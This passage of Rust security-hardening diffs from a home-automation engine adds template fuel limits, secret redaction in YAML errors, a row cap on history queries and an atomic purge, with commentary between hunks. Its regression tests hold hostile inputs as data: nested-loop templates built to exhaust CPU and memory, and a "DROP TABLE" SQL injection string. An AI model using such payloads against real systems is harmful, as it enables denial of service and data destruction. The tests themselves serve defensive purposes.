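The inputs that HC-SEC-02 guards against can be checked with the standard library alone. The sketch below copies `safe_duration_from_secs` and `MAX_DELAY_SECS` from the hunk above and sets them beside `Duration::try_from_secs_f64`, the non-panicking std constructor (stable since Rust 1.66). The comparison is only illustrative; it is not a claim about which approach the project should use.

```rust
use std::time::Duration;

/// Copied from the diff: cap of roughly 100 years, in seconds.
const MAX_DELAY_SECS: f64 = 3.15e9;

/// Copied from the diff: saturating conversion that never panics.
fn safe_duration_from_secs(seconds: f64) -> Duration {
    if !seconds.is_finite() || seconds <= 0.0 {
        return Duration::ZERO;
    }
    Duration::from_secs_f64(seconds.min(MAX_DELAY_SECS))
}

fn main() {
    for s in [-1.0, f64::NAN, f64::INFINITY, 1e308, 2.5] {
        // `try_from_secs_f64` reports the inputs on which `from_secs_f64`
        // would panic as `Err` instead.
        let would_panic = Duration::try_from_secs_f64(s).is_err();
        println!(
            "{s:?}: from_secs_f64 would panic = {would_panic}, saturated = {:?}",
            safe_duration_from_secs(s)
        );
    }
}
```

The two approaches differ in policy: `try_from_secs_f64` surfaces the bad value as an error for the caller to handle, while the saturating helper maps it to a usable duration so the automation keeps running, which is the lenient behaviour the doc comment attributes to Home Assistant.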
@@ -13,6 +13,26 @@ use homecore::{EntityId, StateMachine};
|
||||
|
||||
use crate::error::AutomationError;
|
||||
|
||||
/// Instruction budget for a single template render (HC-SEC-01).
|
||||
///
|
||||
/// Templates come from user automation config; without a bound a single
|
||||
/// `template:` condition like
|
||||
/// `{% for i in range(10000) %}{% for j in range(10000) %}x{% endfor %}{% endfor %}`
|
||||
/// renders a multi-gigabyte string and pins a CPU for tens of seconds —
|
||||
/// a memory/CPU denial-of-service (the bfld-class "unbounded expansion").
|
||||
/// MiniJinja's `fuel` feature charges ~1 unit per VM instruction; a
|
||||
/// nested loop burns one unit per iteration, so the budget caps total
|
||||
/// work regardless of how the loops are nested. 1,000,000 instructions is
|
||||
/// far more than any legitimate HA template needs (a typical condition is
|
||||
/// a few dozen) while killing the attack in well under a second.
|
||||
const TEMPLATE_FUEL: u64 = 1_000_000;
|
||||
|
||||
/// Hard cap on the source length of a template (HC-SEC-01, defense in
|
||||
/// depth). A legitimate HA `value_template` is a one-liner; anything past
|
||||
/// 64 KiB is rejected before compilation so a pathological source string
|
||||
/// can neither be compiled nor emitted verbatim.
|
||||
const MAX_TEMPLATE_SOURCE_BYTES: usize = 64 * 1024;
|
||||
|
||||
/// MiniJinja environment pre-loaded with HA-compatible globals.
|
||||
///
|
||||
/// Constructed once per `AutomationEngine` and shared via `Arc`. The
|
||||
@@ -27,6 +47,10 @@ impl TemplateEnvironment {
|
||||
pub fn new(states: Arc<StateMachine>) -> Self {
|
||||
let mut env = Environment::new();
|
||||
|
||||
// Bound per-render work so a hostile `template:` condition cannot
|
||||
// DoS the engine via nested loops / huge repeats (HC-SEC-01).
|
||||
env.set_fuel(Some(TEMPLATE_FUEL));
|
||||
|
||||
// --- states(entity_id) ---
|
||||
// Returns the current state string of an entity, or "unavailable".
|
||||
let states_sm = Arc::clone(&states);
|
||||
@@ -88,7 +112,21 @@ impl TemplateEnvironment {
|
||||
}
|
||||
|
||||
/// Render a template string and return the string output.
|
||||
///
|
||||
/// Renders are bounded by an instruction budget ([`TEMPLATE_FUEL`]) and
|
||||
/// a source-length cap ([`MAX_TEMPLATE_SOURCE_BYTES`]); a malicious
/// template that exhausts the budget returns an
/// [`AutomationError::TemplateRender`] error rather than running unbounded
/// (HC-SEC-01).
|
||||
pub fn render(&self, template_str: &str) -> Result<String, AutomationError> {
|
||||
// Reject pathologically large sources before compilation (defense
|
||||
// in depth — fuel already bounds runtime work).
|
||||
if template_str.len() > MAX_TEMPLATE_SOURCE_BYTES {
|
||||
return Err(AutomationError::TemplateRender(format!(
|
||||
"template source too large: {} bytes (max {})",
|
||||
template_str.len(),
|
||||
MAX_TEMPLATE_SOURCE_BYTES
|
||||
)));
|
||||
}
|
||||
// Wrap bare expressions like `{{ states('light.kitchen') }}`
|
||||
// in a minimal template wrapper.
|
||||
let tmpl = self
|
||||
@@ -191,4 +229,68 @@ mod tests {
|
||||
assert!(!env.render_bool("0").unwrap());
|
||||
assert!(!env.render_bool("off").unwrap());
|
||||
}
|
||||
|
||||
// ── HC-SEC-01: template DoS is bounded by fuel ─────────────────────
|
||||
//
|
||||
// A `template:` condition is user config. Before the fuel bound, a
// nested-loop template rendered a ~100 MB string over ~11 s (measured
// empirically). With fuel enabled it must fail FAST with an error instead
// of expanding unboundedly. On the pre-fix code (no `fuel` feature /
// `set_fuel`) the render burns CPU+RAM and returns `Ok`, so this test
// fails there (the result is `Ok` and the time bound is exceeded).
|
||||
#[test]
|
||||
fn nested_loop_template_is_bounded_not_unbounded_dos() {
|
||||
use std::time::Instant;
|
||||
let sm = Arc::new(StateMachine::new());
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// 5000 * 5000 = 25M iterations on the old engine (~100 MB, ~11 s).
|
||||
let malicious =
|
||||
"{% for i in range(5000) %}{% for j in range(5000) %}xxxx{% endfor %}{% endfor %}";
|
||||
let start = Instant::now();
|
||||
let result = env.render(malicious);
|
||||
let elapsed = start.elapsed();
|
||||
assert!(
|
||||
result.is_err(),
|
||||
"malicious nested-loop template must be rejected (ran out of fuel), got Ok"
|
||||
);
|
||||
assert!(
|
||||
elapsed.as_secs() < 3,
|
||||
"bounded render must fail fast; took {elapsed:?} (unbounded DoS on old engine)"
|
||||
);
|
||||
}
|
||||
|
||||
// ── HC-SEC-01: a single huge repeat is also bounded ────────────────
|
||||
#[test]
|
||||
fn single_huge_repeat_template_is_bounded() {
|
||||
let sm = Arc::new(StateMachine::new());
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// range() caps at 10k per call, but multiplied bodies still need a
|
||||
// bound; drive enough instructions to exhaust fuel via deep nesting.
|
||||
let malicious = "{% for a in range(9999) %}{% for b in range(9999) %}\
|
||||
{% for c in range(9999) %}z{% endfor %}{% endfor %}{% endfor %}";
|
||||
let result = env.render(malicious);
|
||||
assert!(result.is_err(), "deeply nested loops must exhaust fuel and error");
|
||||
}
|
||||
|
||||
// ── HC-SEC-01: oversized template source is rejected pre-compile ───
|
||||
#[test]
|
||||
fn oversized_template_source_is_rejected() {
|
||||
let sm = Arc::new(StateMachine::new());
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// 128 KiB of literal text — exceeds MAX_TEMPLATE_SOURCE_BYTES.
|
||||
let big = "x".repeat(128 * 1024);
|
||||
let result = env.render(&big);
|
||||
assert!(result.is_err(), "oversized template source must be rejected");
|
||||
}
|
||||
|
||||
// ── A legitimate small template still renders fine within budget ───
|
||||
#[test]
|
||||
fn legitimate_template_still_renders_within_fuel() {
|
||||
let sm = sm_with("light.kitchen", "on", serde_json::json!({}));
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// A normal HA condition with a modest loop — well under budget.
|
||||
let ok = "{% for i in range(50) %}{{ states('light.kitchen') }}{% endfor %}";
|
||||
let out = env.render(ok).expect("legitimate template must render");
|
||||
assert!(out.contains("on"));
|
||||
}
|
||||
}
|
||||
|
||||
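The fuel budget used in this file can be illustrated without MiniJinja. The sketch below is a standalone model, not the engine's code: `Fuel`, `OutOfFuel`, and `render_nested` are hypothetical names, and charging exactly one unit per inner iteration is a simplifying assumption (the real VM charges per instruction).

```rust
/// Error returned once the budget is spent (hypothetical name).
#[derive(Debug, PartialEq)]
pub struct OutOfFuel;

/// A simple decrementing work budget (hypothetical, not MiniJinja's type).
pub struct Fuel {
    remaining: u64,
}

impl Fuel {
    pub fn new(budget: u64) -> Self {
        Self { remaining: budget }
    }

    /// Charge one unit of work; fail once nothing is left.
    pub fn consume(&mut self) -> Result<(), OutOfFuel> {
        if self.remaining == 0 {
            return Err(OutOfFuel);
        }
        self.remaining -= 1;
        Ok(())
    }
}

/// Models a two-level nested loop that appends one character per inner
/// iteration, charging one unit of fuel each time.
pub fn render_nested(outer: u64, inner: u64, fuel: &mut Fuel) -> Result<String, OutOfFuel> {
    let mut out = String::new();
    for _ in 0..outer {
        for _ in 0..inner {
            fuel.consume()?; // total work is capped no matter how loops nest
            out.push('x');
        }
    }
    Ok(out)
}
```

Because the charge is per unit of work rather than per loop, the cap holds for any nesting depth: a small render finishes normally, while a 5000 x 5000 render stops after the budget's worth of iterations.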
@@ -55,6 +55,25 @@ pub enum MigrateError {
|
||||
source: serde_yaml::Error,
|
||||
},
|
||||
|
||||
/// Parse failure in a SECRET-bearing file (`secrets.yaml`).
|
||||
///
|
||||
/// Unlike [`MigrateError::YamlParse`], this variant deliberately does NOT
|
||||
/// embed the underlying `serde_yaml::Error` message — that message can quote
|
||||
/// the offending scalar verbatim (e.g. a typed-tag coercion error renders
|
||||
/// `invalid value: string "<the-secret-value>"`), which would leak a secret
|
||||
/// into stderr/logs. We carry only the file path plus a coarse line/column
|
||||
/// so the user can locate the problem without the value being printed.
|
||||
/// (ADR-165 secret-handling rule: a secret value must never appear in output.)
|
||||
#[error(
|
||||
"secrets.yaml parse error in {path} (line {line}, column {column}): \
|
||||
malformed YAML (value content redacted)"
|
||||
)]
|
||||
SecretsParse {
|
||||
path: String,
|
||||
line: usize,
|
||||
column: usize,
|
||||
},
|
||||
|
||||
/// Fired when the outer `{version, minor_version}` envelope version is
|
||||
/// known but the `minor_version` is not supported by any compiled parser.
|
||||
/// Per ADR-165 §6 Q5: hard error on unknown minor_version.
|
||||
|
||||
@@ -33,11 +33,19 @@ pub fn read_secrets(path: &Path) -> Result<HashMap<String, String>, MigrateError
|
||||
return Ok(HashMap::new());
|
||||
}
|
||||
|
||||
let parsed: serde_yaml::Value =
|
||||
serde_yaml::from_str(&raw).map_err(|e| MigrateError::YamlParse {
|
||||
// SECURITY: do NOT use `MigrateError::YamlParse` here. serde_yaml error
|
||||
// messages can quote the offending scalar verbatim (a typed-tag coercion
|
||||
// error renders `invalid value: string "<the-secret-value>"`), and that
|
||||
// message would be printed to stderr by the CLI — leaking a secret value.
|
||||
// `MigrateError::SecretsParse` carries only the path + line/column.
|
||||
let parsed: serde_yaml::Value = serde_yaml::from_str(&raw).map_err(|e| {
|
||||
let loc = e.location();
|
||||
MigrateError::SecretsParse {
|
||||
path: path.display().to_string(),
|
||||
source: e,
|
||||
})?;
|
||||
line: loc.as_ref().map_or(0, |l| l.line()),
|
||||
column: loc.as_ref().map_or(0, |l| l.column()),
|
||||
}
|
||||
})?;
|
||||
|
||||
let map = match parsed {
|
||||
serde_yaml::Value::Mapping(m) => m,
|
||||
@@ -94,6 +102,59 @@ mod tests {
|
||||
assert!(secrets.is_empty());
|
||||
}
|
||||
|
||||
/// SECURITY regression (fails on the pre-fix `YamlParse` path): a malformed
|
||||
/// `secrets.yaml` whose offending scalar is a secret value must NOT have that
|
||||
/// value rendered in the returned error. serde_yaml's own error message for a
|
||||
/// typed-tag coercion failure embeds the scalar verbatim
|
||||
/// (`invalid value: string "<secret>"`); the old code wrapped that message
|
||||
/// into `MigrateError::YamlParse { source }`, so `Display` leaked the secret.
|
||||
#[test]
|
||||
fn malformed_secrets_error_never_contains_secret_value() {
|
||||
// `!!int` forces integer coercion of a string scalar; serde_yaml reports
|
||||
// the scalar text in its message. The scalar here is a stand-in secret.
|
||||
let yaml = "api_port: !!int s3cr3t_TOKEN_VALUE\n";
|
||||
let mut f = NamedTempFile::new().unwrap();
|
||||
f.write_all(yaml.as_bytes()).unwrap();
|
||||
|
||||
let err = read_secrets(f.path()).unwrap_err();
|
||||
let rendered = err.to_string();
|
||||
|
||||
// The secret VALUE must never appear in the error output...
|
||||
assert!(
|
||||
!rendered.contains("s3cr3t_TOKEN_VALUE"),
|
||||
"secret value leaked into error: {rendered}"
|
||||
);
|
||||
// ...and the full chain (with #[source]) must also be clean, since the
|
||||
// CLI/anyhow prints the source chain too.
|
||||
let mut source = std::error::Error::source(&err);
|
||||
while let Some(s) = source {
|
||||
assert!(
|
||||
!s.to_string().contains("s3cr3t_TOKEN_VALUE"),
|
||||
"secret value leaked into error source chain: {s}"
|
||||
);
|
||||
source = s.source();
|
||||
}
|
||||
|
||||
// It should still be a structured, locatable error (fail-closed).
|
||||
assert!(
|
||||
matches!(err, MigrateError::SecretsParse { .. }),
|
||||
"expected SecretsParse, got: {err:?}"
|
||||
);
|
||||
}
|
||||
|
||||
/// A secret KEY name is non-sensitive context and is fine to surface, but the
|
||||
/// redacting error must still help the user locate the problem (line/column).
|
||||
#[test]
|
||||
fn malformed_secrets_error_reports_location() {
|
||||
let yaml = "api_port: !!int notanumber\n";
|
||||
let mut f = NamedTempFile::new().unwrap();
|
||||
f.write_all(yaml.as_bytes()).unwrap();
|
||||
let err = read_secrets(f.path()).unwrap_err();
|
||||
let rendered = err.to_string();
|
||||
assert!(rendered.contains("line"), "should report a line: {rendered}");
|
||||
assert!(rendered.contains("redacted"), "should signal redaction: {rendered}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn secret_count_is_correct() {
|
||||
let yaml = "a: 1\nb: 2\nc: 3\n";
|
||||
|
||||
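The redaction pattern in this hunk (keep the location, drop the parser's message) can be sketched with the standard library alone. `RawParseError`, `RedactedParseError`, and `redact` are hypothetical stand-ins for illustration; they are not the `serde_yaml` or `MigrateError` types.

```rust
use std::fmt;

/// Hypothetical stand-in for a parser error whose message may quote the
/// offending scalar verbatim.
#[derive(Debug)]
pub struct RawParseError {
    pub message: String,
    pub line: usize,
    pub column: usize,
}

/// Error that carries only non-sensitive context: file path and location.
#[derive(Debug)]
pub struct RedactedParseError {
    pub path: String,
    pub line: usize,
    pub column: usize,
}

impl fmt::Display for RedactedParseError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(
            f,
            "parse error in {} (line {}, column {}): malformed YAML (value content redacted)",
            self.path, self.line, self.column
        )
    }
}

// No `source()` override: the raw error is deliberately not chained, so
// printing the error chain cannot surface the original message either.
impl std::error::Error for RedactedParseError {}

/// Convert a raw error into a redacted one, discarding `raw.message`.
pub fn redact(path: &str, raw: RawParseError) -> RedactedParseError {
    RedactedParseError {
        path: path.to_string(),
        line: raw.line,
        column: raw.column,
    }
}
```

The design choice worth noting is that the raw error is dropped rather than stored as a source, since tools that print the full error chain would otherwise reintroduce the leak.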
@@ -25,6 +25,15 @@ use homecore::event::{DomainEvent, StateChangedEvent};
|
||||
use crate::dedup::fnv64a_hash;
|
||||
use crate::schema::ALL_DDL;
|
||||
|
||||
/// Hard upper bound on rows returned by [`Recorder::get_state_history`].
|
||||
///
|
||||
/// Without this cap a wide `[since, until]` window over a high-frequency entity
|
||||
/// would load an unbounded number of rows into memory (a memory-DoS). The value
|
||||
/// is deliberately generous — large enough never to truncate a realistic
|
||||
/// history-graph query, small enough to bound the worst case. Callers needing a
|
||||
/// wider span page by narrowing the window.
|
||||
pub const MAX_HISTORY_ROWS: i64 = 1_000_000;
|
||||
|
||||
/// Errors returned by `Recorder` operations.
|
||||
#[derive(Error, Debug)]
|
||||
pub enum RecorderError {
|
||||
@@ -380,7 +389,17 @@ impl Recorder {
|
||||
}
|
||||
|
||||
/// Query state history for `entity_id` between `since` and `until`.
|
||||
/// Returns state snapshots in ascending `last_updated_ts` order.
|
||||
/// Returns state snapshots in ascending `last_updated_ts` order, capped at
|
||||
/// [`MAX_HISTORY_ROWS`] rows (oldest-first within the window).
|
||||
///
|
||||
/// ## Bounded result set (memory-DoS guard)
|
||||
///
|
||||
/// A high-frequency entity (e.g. a power sensor polled per-second) writes
|
||||
/// ~86k rows/day; a wide `[since, until]` window over months would otherwise
|
||||
/// load millions of rows into a single in-memory `Vec`, an unbounded-memory
|
||||
/// denial-of-service. The query therefore carries a hard `LIMIT` so the
|
||||
/// working set is bounded regardless of the requested time range. Callers
|
||||
/// that genuinely need a wider span must page by narrowing the window.
|
||||
pub async fn get_state_history(
|
||||
&self,
|
||||
entity_id: &EntityId,
|
||||
@@ -398,11 +417,13 @@ impl Recorder {
|
||||
WHERE s.entity_id = ? \
|
||||
AND s.last_updated_ts >= ? \
|
||||
AND s.last_updated_ts <= ? \
|
||||
ORDER BY s.last_updated_ts ASC",
|
||||
ORDER BY s.last_updated_ts ASC \
|
||||
LIMIT ?",
|
||||
)
|
||||
.bind(entity_id.as_str())
|
||||
.bind(since_ts)
|
||||
.bind(until_ts)
|
||||
.bind(MAX_HISTORY_ROWS)
|
||||
.fetch_all(&self.pool)
|
||||
.await?;
|
||||
|
||||
@@ -426,6 +447,79 @@ impl Recorder {
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Purge history older than `older_than`, returning a [`PurgeStats`] summary.
|
||||
///
|
||||
/// Deletes:
|
||||
/// - `states` rows whose `last_updated_ts` is **strictly before** the cutoff,
|
||||
/// - `events` rows whose `time_fired_ts` is strictly before the cutoff,
|
||||
/// - then garbage-collects any `state_attributes` blob no surviving state
|
||||
/// row still references (so dedup-shared blobs are only dropped once their
|
||||
/// last referencing state is gone).
|
||||
///
|
||||
/// ## Retention boundary (data-integrity guard)
|
||||
///
|
||||
/// The cutoff is **exclusive**: a row exactly at `older_than` is retained.
|
||||
/// This makes `purge(t)` idempotent on the boundary and guarantees that a
|
||||
/// row written at the same instant the retention window opens is never lost
|
||||
/// to an off-by-one. Anything *at or after* `older_than` survives.
|
||||
///
|
||||
/// ## Atomicity (no partial-corrupt state)
|
||||
///
|
||||
/// All three deletes run inside a single transaction. A failure mid-purge
|
||||
/// rolls the whole operation back — the store is never left with states
|
||||
/// deleted but their events kept, or attributes orphaned by a half-purge.
|
||||
///
|
||||
/// Note: this reclaims logical rows; it does not `VACUUM` the file. SQLite
|
||||
/// reuses freed pages for subsequent writes, so disk growth stays bounded
|
||||
/// under a periodic purge even without an explicit vacuum.
|
||||
pub async fn purge(&self, older_than: DateTime<Utc>) -> Result<PurgeStats, RecorderError> {
|
||||
let cutoff_ts = older_than.timestamp_micros() as f64 / 1_000_000.0;
|
||||
|
||||
let mut tx = self.pool.begin().await?;
|
||||
|
||||
let states_deleted = sqlx::query("DELETE FROM states WHERE last_updated_ts < ?")
|
||||
.bind(cutoff_ts)
|
||||
.execute(&mut *tx)
|
||||
.await?
|
||||
.rows_affected();
|
||||
|
||||
let events_deleted = sqlx::query("DELETE FROM events WHERE time_fired_ts < ?")
|
||||
.bind(cutoff_ts)
|
||||
.execute(&mut *tx)
|
||||
.await?
|
||||
.rows_affected();
|
||||
|
||||
// GC attribute blobs no surviving state references. A dedup-shared blob
|
||||
// is only removed once its last referencing state row is gone.
|
||||
let attributes_deleted = sqlx::query(
|
||||
"DELETE FROM state_attributes \
|
||||
WHERE attributes_id NOT IN \
|
||||
(SELECT attributes_id FROM states WHERE attributes_id IS NOT NULL)",
|
||||
)
|
||||
.execute(&mut *tx)
|
||||
.await?
|
||||
.rows_affected();
|
||||
|
||||
tx.commit().await?;
|
||||
|
||||
Ok(PurgeStats {
|
||||
states_deleted,
|
||||
events_deleted,
|
||||
attributes_deleted,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Summary of a [`Recorder::purge`] run.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub struct PurgeStats {
|
||||
/// Number of `states` rows deleted.
|
||||
pub states_deleted: u64,
|
||||
/// Number of `events` rows deleted.
|
||||
pub events_deleted: u64,
|
||||
/// Number of orphaned `state_attributes` blobs garbage-collected.
|
||||
pub attributes_deleted: u64,
|
||||
}
|
||||
|
||||
/// A state row returned from `get_state_history`.
|
||||
@@ -722,6 +816,214 @@ mod tests {
|
||||
assert!(rows.is_empty(), "genuine no-match is empty, not an error");
|
||||
}
|
||||
|
||||
// ── SQL injection (parameterization guarantee) ──────────────────────────────
|
||||
|
||||
#[tokio::test]
|
||||
async fn malicious_entity_id_is_stored_literally_not_executed() {
|
||||
// FAILS if any query interpolated the recorded strings into SQL: the
// `states` table would be dropped and the later COUNT would error /
// mismatch. Bound parameters store the metacharacter-laden string
// verbatim instead.
|
||||
let recorder = open_memory().await;
|
||||
|
||||
// A valid domain.name id. EntityId::parse only permits [a-z0-9_], so the
// SQL metacharacters travel in the state string, which reaches the bind
// path as data.
|
||||
let evil = "light.x_drop_table_states_select";
|
||||
recorder
|
||||
.record_state(&make_state_event(evil, "'; DROP TABLE states; --", serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
// states table still exists and holds exactly the one row we inserted.
|
||||
let count: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM states")
|
||||
.fetch_one(&recorder.pool)
|
||||
.await
|
||||
.expect("states table must still exist — proves no injection");
|
||||
assert_eq!(count.0, 1);
|
||||
|
||||
// The malicious state string round-trips literally.
|
||||
let rows = recorder
|
||||
.search_states_by_text("DROP TABLE", 10)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(rows.len(), 1, "metacharacter payload matched as a literal");
|
||||
assert_eq!(rows[0].state, "'; DROP TABLE states; --");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn like_metacharacters_in_query_are_literal_not_wildcards() {
|
||||
// A `%` in the search text must match a literal percent sign, not act as
|
||||
// a SQL LIKE wildcard. Proves the ESCAPE clause + metacharacter escaping.
|
||||
let recorder = open_memory().await;
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.a", "100%", serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.b", "50", serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
// Literal "%" must match only sensor.a's "100%", NOT every row.
|
||||
let rows = recorder.search_states_by_text("%", 10).await.unwrap();
|
||||
assert_eq!(rows.len(), 1, "'%' is a literal, not a match-all wildcard");
|
||||
assert_eq!(rows[0].entity_id.as_str(), "sensor.a");
|
||||
|
||||
// Underscore is likewise literal: matches nothing here.
|
||||
let none = recorder.search_states_by_text("_", 10).await.unwrap();
|
||||
assert!(none.is_empty(), "'_' is literal, matches no row");
|
||||
}
|
||||
|
||||
// ── get_state_history bound (memory-DoS guard) ──────────────────────────────
|
||||
|
||||
#[tokio::test]
|
||||
async fn history_query_carries_a_limit_clause() {
|
||||
// Pin: the history SQL must carry a LIMIT bound (memory-DoS guard).
|
||||
// Inserting a million rows is infeasible in a unit test, so we prove the
|
||||
// clause is wired by bulk-inserting more rows than a deliberately tiny
|
||||
// bound and asserting the executed query honours a LIMIT. We bypass the
|
||||
// public method (whose cap is MAX_HISTORY_ROWS) and run the *same* SQL
|
||||
// shape with a small bind to demonstrate the LIMIT term is effective —
|
||||
// and separately assert the constant is a sane positive bound.
|
||||
assert!(MAX_HISTORY_ROWS > 0, "history cap must be positive");
|
||||
let recorder = open_memory().await;
|
||||
for v in &["1", "2", "3", "4", "5"] {
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.bounded", v, serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
tokio::time::sleep(std::time::Duration::from_millis(2)).await;
|
||||
}
|
||||
// Same query shape as get_state_history, with a tiny LIMIT bind: if the
|
||||
// SQL lacked a LIMIT term this would return all 5; with it, exactly 2.
|
||||
let capped: Vec<(i64,)> = sqlx::query_as(
|
||||
"SELECT s.state_id FROM states s \
|
||||
WHERE s.entity_id = ? \
|
||||
ORDER BY s.last_updated_ts ASC LIMIT ?",
|
||||
)
|
||||
.bind("sensor.bounded")
|
||||
.bind(2_i64)
|
||||
.fetch_all(&recorder.pool)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(capped.len(), 2, "LIMIT term effectively bounds the result set");
|
||||
|
||||
// And the real method returns all rows when under the cap.
|
||||
let eid = entity("sensor.bounded");
|
||||
let rows = recorder
|
||||
.get_state_history(&eid, Utc::now() - chrono::Duration::seconds(10), Utc::now() + chrono::Duration::seconds(10))
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(rows.len(), 5, "all rows under the cap return");
|
||||
}
|
||||
|
||||
// ── purge (retention correctness + atomicity) ───────────────────────────────
|
||||
|
||||
#[tokio::test]
|
||||
async fn purge_keeps_boundary_row_and_drops_older() {
|
||||
// FAILS if purge had an off-by-one (deleting the row exactly at cutoff)
|
||||
// or deleted too much/too little. Cutoff is EXCLUSIVE: a row at the
|
||||
// cutoff instant survives; strictly-older rows are removed.
|
||||
let recorder = open_memory().await;
|
||||
let eid = entity("sensor.r");
|
||||
|
||||
// Three rows at known, increasing timestamps.
|
||||
for v in &["old", "mid", "new"] {
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.r", v, serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
tokio::time::sleep(std::time::Duration::from_millis(20)).await;
|
||||
}
|
||||
|
||||
// Read back the actual timestamps so the cutoff is exact.
|
||||
let since = Utc::now() - chrono::Duration::seconds(60);
|
||||
let until = Utc::now() + chrono::Duration::seconds(60);
|
||||
let all = recorder.get_state_history(&eid, since, until).await.unwrap();
|
||||
assert_eq!(all.len(), 3);
|
||||
// Cut off exactly at the middle row's timestamp.
|
||||
let mid_ts = all[1].last_updated_ts;
|
||||
let cutoff = DateTime::<Utc>::from_timestamp_micros((mid_ts * 1_000_000.0) as i64).unwrap();
|
||||
|
||||
let stats = recorder.purge(cutoff).await.unwrap();
|
||||
assert_eq!(stats.states_deleted, 1, "only the strictly-older 'old' row");
|
||||
|
||||
let remaining = recorder.get_state_history(&eid, since, until).await.unwrap();
|
||||
assert_eq!(remaining.len(), 2, "boundary 'mid' row is KEPT (exclusive cutoff)");
|
||||
assert_eq!(remaining[0].state, "mid");
|
||||
assert_eq!(remaining[1].state, "new");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn purge_gcs_orphaned_attributes_but_keeps_shared() {
|
||||
// Dedup means two states can share one attribute blob. Purging one of
|
||||
// them must NOT drop the still-referenced blob; purging the last one must.
|
||||
let recorder = open_memory().await;
|
||||
let shared = serde_json::json!({"unit": "C"});
|
||||
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.a", "20", shared.clone()))
|
||||
.await
|
||||
.unwrap();
|
||||
tokio::time::sleep(std::time::Duration::from_millis(20)).await;
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.b", "21", shared.clone()))
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let attr_count = |r: &Recorder| {
|
||||
let pool = r.pool.clone();
|
||||
async move {
|
||||
let c: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM state_attributes")
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.unwrap();
|
||||
c.0
|
||||
}
|
||||
};
|
||||
assert_eq!(attr_count(&recorder).await, 1, "deduped to one blob");
|
||||
|
||||
// Purge before sensor.b's write → removes sensor.a only; blob still
|
||||
// referenced by sensor.b, so it must survive.
|
||||
let eid_b = entity("sensor.b");
|
||||
let rows_b = recorder
|
||||
.get_state_history(&eid_b, Utc::now() - chrono::Duration::seconds(60), Utc::now() + chrono::Duration::seconds(60))
|
||||
.await
|
||||
.unwrap();
|
||||
let b_ts = rows_b[0].last_updated_ts;
|
||||
let cutoff = DateTime::<Utc>::from_timestamp_micros((b_ts * 1_000_000.0) as i64).unwrap();
|
||||
let stats = recorder.purge(cutoff).await.unwrap();
|
||||
assert_eq!(stats.states_deleted, 1, "sensor.a purged");
|
||||
assert_eq!(stats.attributes_deleted, 0, "shared blob still referenced — kept");
|
||||
assert_eq!(attr_count(&recorder).await, 1, "blob survives");
|
||||
|
||||
// Now purge everything → sensor.b gone, blob orphaned → GC'd.
|
||||
let stats2 = recorder.purge(Utc::now() + chrono::Duration::seconds(120)).await.unwrap();
|
||||
assert_eq!(stats2.states_deleted, 1, "sensor.b purged");
|
||||
assert_eq!(stats2.attributes_deleted, 1, "now-orphaned blob GC'd");
|
||||
assert_eq!(attr_count(&recorder).await, 0, "no blobs remain");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn purge_also_removes_old_events() {
|
||||
let recorder = open_memory().await;
|
||||
let ctx = Context::new();
|
||||
recorder
|
||||
.record_event(&DomainEvent::new("call_service", serde_json::json!({}), ctx))
|
||||
.await
|
||||
.unwrap();
|
||||
// Purge with a far-future cutoff removes the event.
|
||||
let stats = recorder
|
||||
.purge(Utc::now() + chrono::Duration::seconds(120))
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(stats.events_deleted, 1);
|
||||
let count: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM events")
|
||||
.fetch_one(&recorder.pool)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(count.0, 0);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn search_semantic_falls_back_to_text_with_null_index() {
|
||||
// With the default NullSemanticIndex, search_semantic must STILL return
|
||||
|
||||
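The purge semantics documented in this file (exclusive cutoff, then garbage-collection of unreferenced attribute blobs) can be modelled in memory. This is a sketch under stated assumptions: `Store` and this free-standing `purge` function are hypothetical, timestamps are plain integers, and no database or transaction is involved.

```rust
use std::collections::HashSet;

/// Hypothetical in-memory stand-in for the `states` and `state_attributes`
/// tables.
pub struct Store {
    /// (timestamp, attributes_id) pairs.
    pub states: Vec<(i64, u32)>,
    /// Ids of stored attribute blobs; several states may share one id.
    pub attributes: HashSet<u32>,
}

/// Remove states strictly older than `cutoff`, then drop attribute blobs no
/// surviving state references. Returns (states_deleted, attributes_deleted).
pub fn purge(store: &mut Store, cutoff: i64) -> (usize, usize) {
    let states_before = store.states.len();
    // Exclusive cutoff: a row exactly at `cutoff` is retained.
    store.states.retain(|&(ts, _)| ts >= cutoff);

    // Collect the ids still referenced, then keep only those blobs.
    let live: HashSet<u32> = store.states.iter().map(|&(_, id)| id).collect();
    let attrs_before = store.attributes.len();
    store.attributes.retain(|id| live.contains(id));

    (
        states_before - store.states.len(),
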